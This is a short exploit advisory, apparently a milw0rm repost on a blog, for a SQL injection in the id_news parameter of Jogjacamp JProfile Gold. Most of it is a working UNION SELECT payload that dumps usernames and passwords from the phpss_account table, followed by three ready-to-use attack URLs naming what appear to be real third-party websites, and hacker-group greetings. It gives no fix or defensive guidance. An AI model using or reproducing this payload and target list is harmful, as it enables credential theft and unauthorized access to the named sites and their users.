Jogjacamp JProfile Gold (id_news) Remote SQL Injection Vulnerability

Vendor : http://jogjacamp.com

bugs : /index.php?action=news.detail&id_news=

exploit : union select concat(username,0x3a,password),2,3 from phpss_account--

POC : http://www.titiandamai.org/index.php?action=news.detail&id_news=6%20union%20select%20concat(username,0x3a,password),2,3%20from%20phpss_account%20--

http://www.ligaindonesia.com/index.php?action=news.detail&id_news=1976%20%20union%20select%20concat(username,0x3a,password),2,3%20from%20phpss_account%20--

http://hermawan.net/index.php?action=news.detail&id_news=42%20union%20select%20concat(username,0x3a,password),2,3%20from%20phpss_account%20--


greetz : Allah
s3t4n and Paman aka Jack-
my family
and all Mainhack BrotherHood
jupe crew jangan ngegame melulu :p

# milw0rm
Labels: , , ,

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)